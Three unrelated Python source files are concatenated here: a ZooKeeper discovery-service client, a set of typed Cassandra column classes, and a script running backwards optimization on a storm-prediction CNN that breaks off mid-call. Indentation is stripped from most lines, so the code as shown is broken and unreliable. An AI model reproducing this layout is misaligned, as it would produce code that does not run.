def __init__(self, discServer, zk_srv_ip='127.0.0.1',
zk_srv_port='2181', reset_config=False):
self._reset_config = reset_config
self._service_id_to_type = {}
self._ds = discServer
self._zk_sem = BoundedSemaphore(1)
self._election = None
self._restarting = False
zk_endpts = []
for ip in zk_srv_ip.split(','):
zk_endpts.append('%s:%s' %(ip, zk_srv_port))
# logging
logger = logging.getLogger('discovery-service')
logger.setLevel(logging.WARNING)
handler = logging.handlers.RotatingFileHandler('/var/log/contrail/discovery_zk.log', maxBytes=1024*1024, backupCount=10)
log_format = logging.Formatter('%(asctime)s [%(name)s]: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
handler.setFormatter(log_format)
logger.addHandler(handler)
self._zk = kazoo.client.KazooClient(
hosts=','.join(zk_endpts),
handler=kazoo.handlers.gevent.SequentialGeventHandler(),
logger=logger)
self._logger = logger
# connect
self.connect()
if reset_config:
self.delete_node("/services", recursive=True)
self.delete_node("/clients", recursive=True)
self.delete_node("/election", recursive=True)
# create default paths
self.create_node("/services")
self.create_node("/clients")
self.create_node("/election")
self._debug = {
'subscription_expires': 0,
'oos_delete': 0,
'db_excepts': 0,
}
# end __init__
# Discovery server used for syslog, cleanup etc
def set_ds(self, discServer):
self._ds = discServer
# end set_ds
def is_restarting(self):
return self._restarting
# end is_restarting
# restart
def restart(self):
self._zk_sem.acquire()
self._restarting = True
self.syslog("restart: acquired lock; state %s " % self._zk.state)
# initiate restart if our state is suspended or lost
if self._zk.state != "CONNECTED":
self.syslog("restart: starting ...")
try:
self._zk.stop()
self._zk.close()
self._zk.start()
self.syslog("restart: done")
except:
e = sys.exc_info()[0]
self.syslog('restart: exception %s' % str(e))
self._restarting = False
self._zk_sem.release()
# start
def connect(self):
while True:
try:
self._zk.start()
break
except gevent.event.Timeout as e:
                self.syslog(
                    'Failed to connect with ZooKeeper - will retry in a second')
                gevent.sleep(1)
            # ZooKeeper may also raise an exception due to a delay in master election
            except Exception as e:
                self.syslog('%s - will retry in a second' % (str(e)))
gevent.sleep(1)
self.syslog('Connected to ZooKeeper!')
# end
def start_background_tasks(self):
# spawn loop to expire subscriptions
gevent.Greenlet.spawn(self.inuse_loop)
# spawn loop to expire services
gevent.Greenlet.spawn(self.service_oos_loop)
# end
def syslog(self, log_msg):
if self._logger is None:
return
self._logger.info(log_msg)
# end
def get_debug_stats(self):
return self._debug
# end
def _zk_listener(self, state):
if state == "CONNECTED":
self._election.cancel()
# end
def _zk_election_callback(self, func, *args, **kwargs):
self._zk.remove_listener(self._zk_listener)
func(*args, **kwargs)
# end
def master_election(self, path, identifier, func, *args, **kwargs):
self._zk.add_listener(self._zk_listener)
while True:
self._election = self._zk.Election(path, identifier)
self._election.run(self._zk_election_callback, func, *args, **kwargs)
# end master_election
def create_node(self, path, value='', makepath=True, sequence=False):
value = str(value)
while True:
try:
return self._zk.set(path, value)
except kazoo.exceptions.NoNodeException:
self.syslog('create %s' % (path))
return self._zk.create(path, value, makepath=makepath, sequence=sequence)
except (kazoo.exceptions.SessionExpiredError,
kazoo.exceptions.ConnectionLoss):
self.restart()
# end create_node
def get_children(self, path):
while True:
try:
return self._zk.get_children(path)
except (kazoo.exceptions.SessionExpiredError,
kazoo.exceptions.ConnectionLoss):
self.restart()
except Exception:
return []
# end get_children
def read_node(self, path):
while True:
try:
data, stat = self._zk.get(path)
return data,stat
except (kazoo.exceptions.SessionExpiredError,
kazoo.exceptions.ConnectionLoss):
self.restart()
except kazoo.exceptions.NoNodeException:
self.syslog('exc read: node %s does not exist' % path)
return (None, None)
# end read_node
def delete_node(self, path, recursive=False):
while True:
try:
return self._zk.delete(path, recursive=recursive)
except (kazoo.exceptions.SessionExpiredError,
kazoo.exceptions.ConnectionLoss):
self.restart()
except kazoo.exceptions.NoNodeException:
self.syslog('exc delete: node %s does not exist' % path)
return None
# end delete_node
def exists_node(self, path):
while True:
try:
return self._zk.exists(path)
except (kazoo.exceptions.SessionExpiredError,
kazoo.exceptions.ConnectionLoss):
self.restart()
# end exists_node
def service_entries(self):
service_types = self.get_children('/services')
for service_type in service_types:
services = self.get_children('/services/%s' % (service_type))
for service_id in services:
data, stat = self.read_node(
'/services/%s/%s' % (service_type, service_id))
entry = json.loads(data)
yield(entry)
def subscriber_entries(self):
service_types = self.get_children('/clients')
for service_type in service_types:
subscribers = self.get_children('/clients/%s' % (service_type))
for client_id in subscribers:
cl_entry = self.lookup_client(service_type, client_id)
if cl_entry:
yield((client_id, service_type))
# end
def update_service(self, service_type, service_id, data):
path = '/services/%s/%s' % (service_type, service_id)
self.create_node(path, value=json.dumps(data), makepath=True)
# end
def insert_service(self, service_type, service_id, data):
# ensure election path for service type exists
path = '/election/%s' % (service_type)
self.create_node(path)
# preclude duplicate service entry
sid_set = set()
# prevent background task from deleting node under our nose
seq_list = self.get_children(path)
# data for election node is service ID
for sequence in seq_list:
sid, stat = self.read_node(
'/election/%s/%s' % (service_type, sequence))
if sid is not None:
sid_set.add(sid)
if not service_id in sid_set:
path = '/election/%s/node-' % (service_type)
pp = self.create_node(
path, service_id, makepath=True, sequence=True)
pat = path + "(?P<id>.*$)"
mch = re.match(pat, pp)
seq = mch.group('id')
data['sequence'] = seq
self.syslog('ST %s, SID %s not found! Added with sequence %s' %
(service_type, service_id, seq))
# end insert_service
# forget service and subscribers
def delete_service(self, service_type, service_id, recursive = False):
#if self.lookup_subscribers(service_type, service_id):
# return
path = '/services/%s/%s' %(service_type, service_id)
self.delete_node(path, recursive = recursive)
# delete service node if all services gone
path = '/services/%s' %(service_type)
if self.get_children(path):
return
self.delete_node(path)
#end delete_service
def lookup_service(self, service_type, service_id=None):
if not self.exists_node('/services/%s' % (service_type)):
return None
if service_id:
data = None
path = '/services/%s/%s' % (service_type, service_id)
datastr, stat = self.read_node(path)
if datastr:
data = json.loads(datastr)
clients = self.get_children(path)
data['in_use'] = len(clients)
return data
else:
r = []
services = self.get_children('/services/%s' % (service_type))
for service_id in services:
entry = self.lookup_service(service_type, service_id)
r.append(entry)
return r
# end lookup_service
def query_service(self, service_type):
path = '/election/%s' % (service_type)
if not self.exists_node(path):
return None
seq_list = self.get_children(path)
seq_list = sorted(seq_list)
r = []
for sequence in seq_list:
service_id, stat = self.read_node(
'/election/%s/%s' % (service_type, sequence))
entry = self.lookup_service(service_type, service_id)
r.append(entry)
return r
# end
# TODO use include_data available in new versions of kazoo
# tree structure /services/<service-type>/<service-id>
def get_all_services(self):
r = []
service_types = self.get_children('/services')
for service_type in service_types:
services = self.lookup_service(service_type)
r.extend(services)
return r
# end
def insert_client(self, service_type, service_id, client_id, blob, ttl):
data = {'ttl': ttl, 'blob': blob}
path = '/services/%s/%s/%s' % (service_type, service_id, client_id)
self.create_node(path, value=json.dumps(data))
path = '/clients/%s/%s/%s' % (service_type, client_id, service_id)
self.create_node(path, value=json.dumps(data), makepath=True)
# end insert_client
def lookup_subscribers(self, service_type, service_id):
path = '/services/%s/%s' % (service_type, service_id)
if not self.exists_node(path):
return None
clients = self.get_children(path)
return clients
# end lookup_subscribers
def lookup_client(self, service_type, client_id):
try:
datastr, stat = self.read_node(
'/clients/%s/%s' % (service_type, client_id))
data = json.loads(datastr) if datastr else None
except ValueError:
self.syslog('raise ValueError st=%s, cid=%s' %(service_type, client_id))
data = None
return data
# end lookup_client
def insert_client_data(self, service_type, client_id, cldata):
path = '/clients/%s/%s' % (service_type, client_id)
self.create_node(path, value=json.dumps(cldata), makepath=True)
# end insert_client_data
def lookup_subscription(self, service_type, client_id=None,
service_id=None, include_meta=False):
if not self.exists_node('/clients/%s' % (service_type)):
return None
if client_id and service_id:
try:
datastr, stat = self.read_node(
'/clients/%s/%s/%s'
% (service_type, client_id, service_id))
data = json.loads(datastr)
blob = data['blob']
if include_meta:
return (blob, stat, data['ttl'])
else:
return blob
except kazoo.exceptions.NoNodeException:
return None
elif client_id:
# our version of Kazoo doesn't support include_data :-(
try:
services = self.get_children(
'/clients/%s/%s' % (service_type, client_id))
r = []
for service_id in services:
datastr, stat = self.read_node(
'/clients/%s/%s/%s'
% (service_type, client_id, service_id))
if datastr:
data = json.loads(datastr)
blob = data['blob']
r.append((service_id, blob, stat))
# sort services in the order of assignment to this client
# (based on modification time)
rr = sorted(r, key=lambda entry: entry[2].last_modified)
return [(service_id, blob) for service_id, blob, stat in rr]
except kazoo.exceptions.NoNodeException:
return None
else:
clients = self.get_children('/clients/%s' % (service_type))
return clients
# end lookup_subscription
# delete client subscription. Cleanup path if possible
def delete_subscription(self, service_type, client_id, service_id):
path = '/clients/%s/%s/%s' % (service_type, client_id, service_id)
self.delete_node(path)
path = '/services/%s/%s/%s' % (service_type, service_id, client_id)
self.delete_node(path)
# delete client node if all subscriptions gone
path = '/clients/%s/%s' % (service_type, client_id)
if self.get_children(path):
return
self.delete_node(path)
# purge in-memory cache - ideally we are not supposed to know about
# this
self._ds.delete_sub_data(client_id, service_type)
# delete service node if all clients gone
path = '/clients/%s' % (service_type)
if self.get_children(path):
return
self.delete_node(path)
# end
# TODO use include_data available in new versions of kazoo
# tree structure /clients/<service-type>/<client-id>/<service-id>
# return tuple (service_type, client_id, service_id)
def get_all_clients(self):
r = []
service_types = self.get_children('/clients')
for service_type in service_types:
clients = self.get_children('/clients/%s' % (service_type))
for client_id in clients:
services = self.get_children(
'/clients/%s/%s' % (service_type, client_id))
rr = []
for service_id in services:
(datastr, stat, ttl) = self.lookup_subscription(
service_type, client_id, service_id, include_meta=True)
rr.append(
(service_type, client_id, service_id,
stat.last_modified, ttl))
rr = sorted(rr, key=lambda entry: entry[3])
r.extend(rr)
return r
# end get_all_clients
# reset in-use count of clients for each service
def inuse_loop(self):
while True:
service_types = self.get_children('/clients')
for service_type in service_types:
clients = self.get_children('/clients/%s' % (service_type))
for client_id in clients:
services = self.get_children(
'/clients/%s/%s' % (service_type, client_id))
for service_id in services:
path = '/clients/%s/%s/%s' % (
service_type, client_id, service_id)
datastr, stat = self.read_node(path)
data = json.loads(datastr)
now = time.time()
exp_t = stat.last_modified + data['ttl'] +\
disc_consts.TTL_EXPIRY_DELTA
if now > exp_t:
self.delete_subscription(
service_type, client_id, service_id)
self.syslog(
'Expiring st:%s sid:%s cid:%s'
% (service_type, service_id, client_id))
self._debug['subscription_expires'] += 1
gevent.sleep(10)
def service_oos_loop(self):
if self._ds._args.hc_interval <= 0:
return
while True:
for entry in self.service_entries():
if not self._ds.service_expired(entry, include_down=False):
continue
service_type = entry['service_type']
service_id = entry['service_id']
path = '/election/%s/node-%s' % (
service_type, entry['sequence'])
if not self.exists_node(path):
continue
self.syslog('Deleting sequence node %s for service %s:%s' %
(path, service_type, service_id))
self.delete_node(path)
entry['sequence'] = -1
self.update_service(service_type, service_id, entry)
self._debug['oos_delete'] += 1
gevent.sleep(self._ds._args.hc_interval)
# end
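# Minimal usage sketch (illustrative only; the discovery-server object and the
# service payload are hypothetical). All ZooKeeper operations above retry
# transparently via restart() on SessionExpiredError/ConnectionLoss:
#
#   zk = DiscoveryZkClient(disc_server, zk_srv_ip='127.0.0.1', zk_srv_port='2181')
#   zk.update_service('dns-server', 'svc-0001',
#                     {'service_type': 'dns-server', 'service_id': 'svc-0001'})
#   print zk.lookup_service('dns-server', service_id='svc-0001')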
|
from datetime import datetime
import struct
import time
import warnings
__all__ = ['Column', 'DateTime', 'DateTimeString', 'Float64', 'FloatString',
'Long', 'IntString', 'String']
class Column(object):
"""Base class for typed columns."""
def __init__(self, default=None):
self.default = default
class DateTime(Column):
"""Column for :class:`datetime` objects stored as long timestamps."""
def __init__(self, *args, **kwargs):
Column.__init__(self, *args, **kwargs)
self.struct = struct.Struct('q')
def pack(self, val):
if not isinstance(val, datetime):
raise TypeError('expected datetime, %s found' % type(val).__name__)
return self.struct.pack(int(time.mktime(val.timetuple())))
def unpack(self, val):
return datetime.fromtimestamp(self.struct.unpack(val)[0])
class DateTimeString(Column):
"""
Column for :class:`datetime` objects stored as ``%Y-%m-%d %H:%M:%S``
"""
format = '%Y-%m-%d %H:%M:%S'
def pack(self, val):
if not isinstance(val, datetime):
raise TypeError('expected datetime, %s found' % type(val).__name__)
return val.strftime(self.format)
def unpack(self, val):
return datetime.strptime(val, self.format)
class Float64(Column):
"""Column for 64bit floats."""
def __init__(self, *args, **kwargs):
Column.__init__(self, *args, **kwargs)
self.struct = struct.Struct('d')
def pack(self, val):
if not isinstance(val, float):
raise TypeError('expected float, %s found' % type(val).__name__)
return self.struct.pack(val)
def unpack(self, val):
return self.struct.unpack(val)[0]
class FloatString(Column):
"""Column for floats stored as strings."""
def pack(self, val):
if not isinstance(val, float):
raise TypeError('expected float, %s found' % type(val).__name__)
return str(val)
def unpack(self, val):
return float(val)
class Long(Column):
"""
Column for 64bit ints.
This uses big-endian encoding, which is the normal encoding for integers
in Cassandra.
"""
def __init__(self, *args, **kwargs):
Column.__init__(self, *args, **kwargs)
self.struct = struct.Struct('>q')
def pack(self, val):
if not isinstance(val, (int, long)):
raise TypeError('expected int or long, %s found' % type(val).__name__)
return self.struct.pack(val)
def unpack(self, val):
return self.struct.unpack(val)[0]
class IntString(Column):
"""Column for ints stored as strings."""
def pack(self, val):
if not isinstance(val, (int, long)):
raise TypeError('expected int or long, %s found' % type(val).__name__)
return str(val)
def unpack(self, val):
return int(val)
class String(Column):
"""Column for :class:`str` or :class:`unicode` objects."""
def pack(self, val):
if not isinstance(val, basestring):
raise TypeError('expected str or unicode, %s found' % type(val).__name__)
return val
def unpack(self, val):
return val
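# Round-trip sketch (illustrative, not part of the original module): every
# column type packs a Python value into its stored form and unpacks it back.
if __name__ == '__main__':
    long_col = Long()
    assert long_col.unpack(long_col.pack(42)) == 42
    dt_col = DateTimeString()
    stamp = datetime(2013, 1, 2, 3, 4, 5)
    assert dt_col.unpack(dt_col.pack(stamp)) == stamp
    float_col = FloatString()
    assert float_col.unpack(float_col.pack(1.5)) == 1.5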
|
"""Runs backwards optimization on a trained CNN."""
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
import argparse
import numpy
from keras import backend as K
from gewittergefahr.gg_io import storm_tracking_io as tracking_io
from gewittergefahr.deep_learning import cnn
from gewittergefahr.deep_learning import deep_learning_utils as dl_utils
from gewittergefahr.deep_learning import model_interpretation
from gewittergefahr.deep_learning import backwards_optimization as backwards_opt
from gewittergefahr.deep_learning import testing_io
from gewittergefahr.deep_learning import training_validation_io as trainval_io
# random.seed(6695)
# numpy.random.seed(6695)
K.set_session(K.tf.Session(config=K.tf.ConfigProto(
intra_op_parallelism_threads=1, inter_op_parallelism_threads=1,
allow_soft_placement=False
)))
SEPARATOR_STRING = '\n\n' + '*' * 50 + '\n\n'
CLASS_COMPONENT_TYPE_STRING = model_interpretation.CLASS_COMPONENT_TYPE_STRING
NEURON_COMPONENT_TYPE_STRING = model_interpretation.NEURON_COMPONENT_TYPE_STRING
CHANNEL_COMPONENT_TYPE_STRING = (
model_interpretation.CHANNEL_COMPONENT_TYPE_STRING)
MODEL_FILE_ARG_NAME = 'input_model_file_name'
INIT_FUNCTION_ARG_NAME = 'init_function_name'
STORM_METAFILE_ARG_NAME = 'input_storm_metafile_name'
NUM_EXAMPLES_ARG_NAME = 'num_examples'
EXAMPLE_DIR_ARG_NAME = 'input_example_dir_name'
COMPONENT_TYPE_ARG_NAME = 'component_type_string'
TARGET_CLASS_ARG_NAME = 'target_class'
LAYER_NAME_ARG_NAME = 'layer_name'
NEURON_INDICES_ARG_NAME = 'neuron_indices'
CHANNEL_INDEX_ARG_NAME = 'channel_index'
IDEAL_ACTIVATION_ARG_NAME = 'ideal_activation'
NUM_ITERATIONS_ARG_NAME = 'num_iterations'
LEARNING_RATE_ARG_NAME = 'learning_rate'
L2_WEIGHT_ARG_NAME = 'l2_weight'
RADAR_CONSTRAINT_WEIGHT_ARG_NAME = 'radar_constraint_weight'
MINMAX_CONSTRAINT_WEIGHT_ARG_NAME = 'minmax_constraint_weight'
OUTPUT_FILE_ARG_NAME = 'output_file_name'
MODEL_FILE_HELP_STRING = (
'Path to file with trained CNN. Will be read by `cnn.read_model`.')
INIT_FUNCTION_HELP_STRING = (
'Initialization function (used to create initial input matrices for '
'gradient descent). Must be accepted by '
'`backwards_opt.check_init_function`. To initialize with real '
'dataset examples, leave this argument alone.')
STORM_METAFILE_HELP_STRING = (
'[used only if `{0:s}` is empty] Path to Pickle file with storm IDs and '
'times. Will be read by `storm_tracking_io.read_ids_and_times`.'
).format(INIT_FUNCTION_ARG_NAME)
NUM_EXAMPLES_HELP_STRING = (
'Number of examples (storm objects) to read from `{0:s}`. If you want to '
'read all examples, make this non-positive.'
).format(STORM_METAFILE_ARG_NAME)
EXAMPLE_DIR_HELP_STRING = (
'[used only if `{0:s}` is empty] Name of top-level directory with dataset '
'examples. Files therein will be read by '
'`testing_io.read_predictors_specific_examples`, where the '
'"specific examples" correspond to the storm IDs and times specified in '
'`{1:s}`.'
).format(INIT_FUNCTION_ARG_NAME, STORM_METAFILE_ARG_NAME)
COMPONENT_HELP_STRING = (
'Determines model component for which activation will be maximized. See '
'`model_interpretation.check_component_metadata` for details.')
IDEAL_ACTIVATION_HELP_STRING = (
'[used only if {0:s} = "{1:s}" or "{2:s}"] See '
'`backwards_opt.optimize_input_for_neuron` or '
'`backwards_opt.optimize_input_for_channel` for details.'
).format(
COMPONENT_TYPE_ARG_NAME, NEURON_COMPONENT_TYPE_STRING,
    CHANNEL_COMPONENT_TYPE_STRING
)
NUM_ITERATIONS_HELP_STRING = 'Number of iterations for backwards optimization.'
LEARNING_RATE_HELP_STRING = 'Learning rate for backwards optimization.'
L2_WEIGHT_HELP_STRING = (
'Weight for L2 regularization. This will penalize the difference between '
'the original and synthetic (optimized) input tensors. If you do not want '
'L2 regularization, leave this argument alone.')
RADAR_CONSTRAINT_WEIGHT_HELP_STRING = (
'Weight for radar constraints. Used only if the CNN was trained with '
'reduced 2-D radar data (created by column operations). Ensures that '
'column values are consistent (e.g., min reflectivity in layer cannot be > '
'max refl in same layer). If you do not want to enforce radar constraints,'
' leave this argument alone.')
MINMAX_CONSTRAINT_WEIGHT_HELP_STRING = (
'Weight for min-max constraints. Forces physical variables to have '
'realistic values. If you do not want to enforce min-max constraints, '
'leave this argument alone.')
OUTPUT_FILE_HELP_STRING = (
'Path to output file (will be written by '
'`backwards_opt.write_standard_file`).')
INPUT_ARG_PARSER = argparse.ArgumentParser()
INPUT_ARG_PARSER.add_argument(
'--' + MODEL_FILE_ARG_NAME, type=str, required=True,
help=MODEL_FILE_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + INIT_FUNCTION_ARG_NAME, type=str, required=False, default='',
help=INIT_FUNCTION_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + STORM_METAFILE_ARG_NAME, type=str, required=False, default='',
help=STORM_METAFILE_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + NUM_EXAMPLES_ARG_NAME, type=int, required=False, default=-1,
help=NUM_EXAMPLES_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + EXAMPLE_DIR_ARG_NAME, type=str, required=False, default='',
help=EXAMPLE_DIR_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + COMPONENT_TYPE_ARG_NAME, type=str, required=True,
help=COMPONENT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + TARGET_CLASS_ARG_NAME, type=int, required=False, default=-1,
help=COMPONENT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + LAYER_NAME_ARG_NAME, type=str, required=False, default='',
help=COMPONENT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + NEURON_INDICES_ARG_NAME, type=int, nargs='+', required=False,
default=[-1], help=COMPONENT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + CHANNEL_INDEX_ARG_NAME, type=int, required=False, default=-1,
help=COMPONENT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + IDEAL_ACTIVATION_ARG_NAME, type=float, required=False,
default=backwards_opt.DEFAULT_IDEAL_ACTIVATION,
help=IDEAL_ACTIVATION_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + NUM_ITERATIONS_ARG_NAME, type=int, required=False,
default=backwards_opt.DEFAULT_NUM_ITERATIONS,
help=NUM_ITERATIONS_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + LEARNING_RATE_ARG_NAME, type=float, required=False,
default=backwards_opt.DEFAULT_LEARNING_RATE,
help=LEARNING_RATE_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + L2_WEIGHT_ARG_NAME, type=float, required=False,
default=backwards_opt.DEFAULT_L2_WEIGHT, help=L2_WEIGHT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + RADAR_CONSTRAINT_WEIGHT_ARG_NAME, type=float, required=False,
default=-1., help=RADAR_CONSTRAINT_WEIGHT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + MINMAX_CONSTRAINT_WEIGHT_ARG_NAME, type=float, required=False,
default=-1., help=MINMAX_CONSTRAINT_WEIGHT_HELP_STRING)
INPUT_ARG_PARSER.add_argument(
'--' + OUTPUT_FILE_ARG_NAME, type=str, required=True,
help=OUTPUT_FILE_HELP_STRING)
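# Example invocation (sketch; every path below is a hypothetical placeholder,
# and the component-type string must be one of the constants exposed by
# `model_interpretation`):
#
#   python <this_script>.py \
#       --input_model_file_name=/path/to/model.h5 \
#       --input_storm_metafile_name=/path/to/storm_ids_and_times.p \
#       --num_examples=100 \
#       --input_example_dir_name=/path/to/examples \
#       --component_type_string=<class/neuron/channel string> \
#       --target_class=1 \
#       --num_iterations=1000 \
#       --learning_rate=0.01 \
#       --output_file_name=/path/to/backwards_optimization.p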
def _create_initializer(init_function_name, model_metadata_dict):
"""Creates initialization function.
:param init_function_name: See documentation at top of file.
:param model_metadata_dict: Dictionary returned by
`cnn.read_model_metadata`.
:return: init_function: Function (see below).
"""
backwards_opt.check_init_function(init_function_name)
training_option_dict = model_metadata_dict[cnn.TRAINING_OPTION_DICT_KEY]
used_minmax_norm = (
training_option_dict[trainval_io.NORMALIZATION_TYPE_KEY] ==
dl_utils.MINMAX_NORMALIZATION_TYPE_STRING
)
if init_function_name == backwards_opt.CONSTANT_INIT_FUNCTION_NAME:
if used_minmax_norm:
return backwards_opt.create_constant_initializer(
(training_option_dict[trainval_io.MAX_NORMALIZED_VALUE_KEY] -
training_option_dict[trainval_io.MIN_NORMALIZED_VALUE_KEY])
/ 2
)
return backwards_opt.create_constant_initializer(0.)
if init_function_name == backwards_opt.UNIFORM_INIT_FUNCTION_NAME:
if used_minmax_norm:
return backwards_opt.create_uniform_random_initializer(
min_value=training_option_dict[
trainval_io.MIN_NORMALIZED_VALUE_KEY],
max_value=training_option_dict[
trainval_io.MAX_NORMALIZED_VALUE_KEY]
)
return backwards_opt.create_uniform_random_initializer(
min_value=-3., max_value=3.)
if init_function_name == backwards_opt.GAUSSIAN_INIT_FUNCTION_NAME:
if used_minmax_norm:
return backwards_opt.create_gaussian_initializer(
mean=
(training_option_dict[trainval_io.MAX_NORMALIZED_VALUE_KEY] -
training_option_dict[trainval_io.MIN_NORMALIZED_VALUE_KEY])
/ 2,
standard_deviation=
(training_option_dict[trainval_io.MAX_NORMALIZED_VALUE_KEY] -
training_option_dict[trainval_io.MIN_NORMALIZED_VALUE_KEY]) / 6
)
return backwards_opt.create_gaussian_initializer(
mean=0., standard_deviation=1.)
return backwards_opt.create_climo_initializer(
model_metadata_dict=model_metadata_dict)
def _run(model_file_name, init_function_name, storm_metafile_name, num_examples,
top_example_dir_name, component_type_string, target_class, layer_name,
neuron_indices, channel_index, num_iterations, ideal_activation,
learning_rate, l2_weight, radar_constraint_weight,
minmax_constraint_weight, output_file_name):
"""Runs backwards optimization on a trained CNN.
This is effectively the main method.
:param model_file_name: See documentation at top of file.
:param init_function_name: Same.
:param storm_metafile_name: Same.
:param num_examples: Same.
:param top_example_dir_name: Same.
:param component_type_string: Same.
:param target_class: Same.
:param layer_name: Same.
:param neuron_indices: Same.
:param channel_index: Same.
:param num_iterations: Same.
:param ideal_activation: Same.
:param learning_rate: Same.
:param l2_weight: Same.
:param radar_constraint_weight: Same.
:param minmax_constraint_weight: Same.
:param output_file_name: Same.
"""
if l2_weight <= 0:
l2_weight = None
if radar_constraint_weight <= 0:
radar_constraint_weight = None
if minmax_constraint_weight <= 0:
minmax_constraint_weight = None
if ideal_activation <= 0:
ideal_activation = None
if init_function_name in ['', 'None']:
init_function_name = None
model_interpretation.check_component_type(component_type_string)
model_metafile_name = '{0:s}/model_metadata.p'.format(
os.path.split(model_file_name)[0]
)
print('Reading model metadata from: "{0:s}"...'.format(model_metafile_name))
model_metadata_dict = cnn.read_model_metadata(model_metafile_name)
input_matrices = None
init_function = None
full_storm_id_strings = None
storm_times_unix_sec = None
sounding_pressure_matrix_pa = None
if init_function_name is None:
print('Reading storm metadata from: "{0:s}"...'.format(
storm_metafile_name))
full_storm_id_strings, storm_times_unix_sec = (
tracking_io.read_ids_and_times(storm_metafile_name)
)
if 0 < num_examples < len(full_storm_id_strings):
full_storm_id_strings = full_storm_id_strings[:num_examples]
storm_times_unix_sec = storm_times_unix_sec[:num_examples]
example_dict = testing_io.read_predictors_specific_examples(
top_example_dir_name=top_example_dir_name,
desired_full_id_strings=full_storm_id_strings,
desired_times_unix_sec=storm_times_unix_sec,
option_dict=model_metadata_dict[cnn.TRAINING_OPTION_DICT_KEY],
layer_operation_dicts=model_metadata_dict[cnn.LAYER_OPERATIONS_KEY]
)
print(SEPARATOR_STRING)
input_matrices = example_dict[testing_io.INPUT_MATRICES_KEY]
sounding_pressure_matrix_pa = example_dict[
testing_io.SOUNDING_PRESSURES_KEY]
num_examples = input_matrices[0].shape[0]
else:
num_examples = 1
init_function = _create_initializer(
init_function_name=init_function_name,
model_metadata_dict=model_metadata_dict)
print('Reading model from: "{0:s}"...'.format(model_file_name))
model_object = cnn.read_model(model_file_name)
output_matrices = None
initial_activations = numpy.full(num_examples, numpy.nan)
final_activations = numpy.full(num_examples, numpy.nan)
for i in range(num_examples):
if init_function_name is None:
this_init_arg = [a[[i], ...] for a in input_matrices]
else:
this_init_arg = init_function
if component_type_string == CLASS_COMPONENT_TYPE_STRING:
print((
'\nOptimizing {0:d}th of {1:d} images for target class {2:d}...'
).format(
i + 1, num_examples, target_class
))
this_result_dict = backwards_opt.optimize_input_for_class(
model_object=model_object, target_class=target_class,
init_function_or_matrices=this_init_arg,
num_iterations=num_iterations, learning_rate=learning_rate,
l2_weight=l2_weight,
radar_constraint_weight=radar_constraint_weight,
minmax_constraint_weight=minmax_constraint_weight,
model_metadata_dict=model_metadata_dict)
elif component_type_string == NEURON_COMPONENT_TYPE_STRING:
print((
'\nOptimizing {0:d}th of {1:d} images for neuron {2:s} in layer'
' "{3:s}"...'
).format(
i + 1, num_examples, str(neuron_indices), layer_name
))
this_result_dict = backwards_opt.optimize_input_for_neuron(
model_object=model_object, layer_name=layer_name,
neuron_indices=neuron_indices,
init_function_or_matrices=this_init_arg,
num_iterations=num_iterations, learning_rate=learning_rate,
l2_weight=l2_weight, ideal_activation=ideal_activation,
radar_constraint_weight=radar_constraint_weight,
minmax_constraint_weight=minmax_constraint_weight,
model_metadata_dict=model_metadata_dict)
else:
print((
'\nOptimizing {0:d}th of {1:d} images for channel {2:d} in '
'layer "{3:s}"...'
).format(
i + 1, num_examples, channel_index, layer_name
))
this_result_dict = backwards_opt.optimize_input_for_channel(
model_object=model_object, layer_name=layer_name,
channel_index=channel_index,
init_function_or_matrices=this_init_arg,
stat_function_for_neuron_activations=K.max,
num_iterations=num_iterations, learning_rate=learning_rate,
l2_weight=l2_weight, ideal_activation=ideal_activation,
radar_constraint_weight=radar_constraint_weight,
minmax_constraint_weight=minmax_constraint_weight,
model_metadata_dict=model_metadata_dict)
initial_activations[i] = this_result_dict[
backwards_opt.INITIAL_ACTIVATION_KEY]
final_activations[i] = this_result_dict[
backwards_opt.FINAL_ACTIVATION_KEY]
these_output_matrices = this_result_dict[
backwards_opt.NORM_OUTPUT_MATRICES_KEY]
if output_matrices is None:
output_matrices = [None] * len(these_output_matrices)
for k in range(len(output_matrices)):
if output_matrices[k] is None:
output_matrices[k] = these_output_matrices[k] + 0.
else:
output_matrices[k] = numpy.concatenate(
(output_matrices[k], these_output_matrices[k]), axis=0
)
if init_function_name is None:
continue
these_input_matrices = this_result_dict[
backwards_opt.NORM_INPUT_MATRICES_KEY]
if input_matrices is None:
input_matrices = [None] * len(these_input_matrices)
for k in range(len(input_matrices)):
if input_matrices[k] is None:
input_matrices[k] = these_input_matrices[k] + 0.
else:
input_matrices[k] = numpy.concatenate(
(input_matrices[k], these_input_matrices[k]), axis=0
)
print(SEPARATOR_STRING)
training_option_dict = model_metadata_dict[cnn.TRAINING_OPTION_DICT_KEY]
print('Denormalizing input examples...')
input_matrices = trainval_io.separate_shear_and_reflectivity(
list_of_input_matrices=input_matrices,
training_option_dict=training_option_dict)
input_matrices = model_interpretation.denormalize_data(
list_of_input_matrices=input_matrices,
model_metadata_dict=model_metadata_dict)
print('Denormalizing optimized examples...')
output_matrices = trainval_io.separate_shear_and_reflectivity(
list_of_input_matrices=output_matrices,
training_option_dict=training_option_dict)
output_matrices = model_interpretation.denormalize_data(
list_of_input_matrices=output_matrices,
model_metadata_dict=model_metadata_dict)
print('Writing results to: "{0:s}"...'.format(output_file_name))
bwo_metadata_dict = backwards_opt.check_metadata(
component_type_string=component_type_string,
num_iterations=num_iterations, learning_rate=learning_rate,
target_class=target_class, layer_name=layer_name,
ideal_activation=ideal_activation, neuron_indices=neuron_indices,
channel_index=channel_index, l2_weight=l2_weight,
radar_constraint_weight=radar_constraint_weight,
